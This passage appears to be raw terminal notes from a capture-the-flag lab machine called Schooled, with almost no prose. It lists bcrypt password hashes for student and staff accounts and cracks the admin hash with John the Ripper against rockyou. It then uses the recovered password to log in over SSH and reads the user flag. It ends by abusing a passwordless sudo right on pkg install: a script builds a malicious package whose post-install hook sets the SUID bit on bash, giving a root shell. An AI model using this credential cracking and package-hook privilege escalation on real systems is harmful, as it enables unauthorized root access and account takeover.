wright_travis89 $2y$10$XFE/IKSMPg21lenhEfUoVemf4OrtLEL6w2kLIJdYceOOivRB7wnpm wright_travis89@student.schooled.htb
allen_matthew89 $2y$10$kFYnbkwG.vqrorLlAz6hT.p0RqvBwZK2kiHT9v3SHGa8XTCKbwTZq allen_matthew89@student.schooled.htb
sanders_wallis89 $2y$10$br9VzK6V17zJttyB8jK9Tub/1l2h7mgX1E3qcUbLL.GY.JtIBDG5u sanders_wallis89@student.schooled.htb
higgins_jane $2y$10$n9SrsMwmiU.egHN60RleAOauTK2XShvjsCS0tAR6m54hR1Bba6ni2 higgins_jane@staff.schooled.htb
phillips_manuel $2y$10$ZwxEs65Q0gO8rN8zpVGU2eYDvAoVmWYYEhHBPovIHr8HZGBvEYEYG phillips_manuel@staff.schooled.htb
carter_lianne $2y$10$jw.KgN/SIpG2MAKvW8qdiub67JD7STqIER1VeRvAH4fs/DPF57JZe carter_lianne@staff.schooled.htb
parker_dan89 $2y$10$MYvrCS5ykPXX0pjVuCGZOOPxgj.fiQAZXyufW5itreQEc2IB2.OSi parker_dan89@student.schooled.htb
parker_tim89 $2y$10$YCYp8F91YdvY2QCg3Cl5r.jzYxMwkwEm/QBGYIs.apyeCeRD7OD6S parker_tim89@student.schooled.htb
| grep -E 'jamie|steve'
admin $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW jamie@staff.schooled.htb
nano hashes
$2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW
john hashes -w=rockyou
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!QAZ2wsx (?)
1g 0:00:02:21 DONE (2024-10-26 14:49) 0.007043g/s 97.87p/s 97.87c/s 97.87C/s goodman..superpet
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
jamie:!QAZ2wsx
ssh jamie@schooled.htb
id
uid=1001(jamie) gid=1001(jamie) groups=1001(jamie),0(wheel)
cat user.txt
0eb4aeaea44ef35de0784646773bcdbb
sudo -l
User jamie may run the following commands on Schooled:
(ALL) NOPASSWD: /usr/sbin/pkg update
(ALL) NOPASSWD: /usr/sbin/pkg install *
nano exploit.sh
#!/bin/sh
STAGEDIR=/tmp/stage
rm -rf ${STAGEDIR}
mkdir -p ${STAGEDIR}
cat >> ${STAGEDIR}/+PRE_DEINSTALL <<EOF
EOF
cat >> ${STAGEDIR}/+POST_INSTALL <<EOF
chmod +s /usr/local/bin/bash
EOF
cat >> ${STAGEDIR}/+MANIFEST <<EOF
name: mypackage
version: "1.0_5"
origin: sysutils/mypackage
comment: "automates stuff"
desc: "automates tasks which can also be undone later"
maintainer: john@doe.it
www: https://doe.it
prefix: /
EOF
pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -o .
chmod +x exploit.sh
./exploit.sh
sudo -u root /usr/sbin/pkg install --no-repo-update *.txz
Checking integrity... done (0 conflicting)
The following 1 package(s) will be affected (of 0 checked):
New packages to be INSTALLED:
mypackage: 1.0_5
Number of packages to be installed: 1
Proceed with this action? [y/N]: y
[1/1] Installing mypackage-1.0_5...
bash -p
id
uid=1001(jamie) gid=1001(jamie) euid=0(root) egid=0(wheel) groups=0(wheel)
whoami
root
cat /root/root.txt
3351bd9a6e7440ec577be8b824e3dbca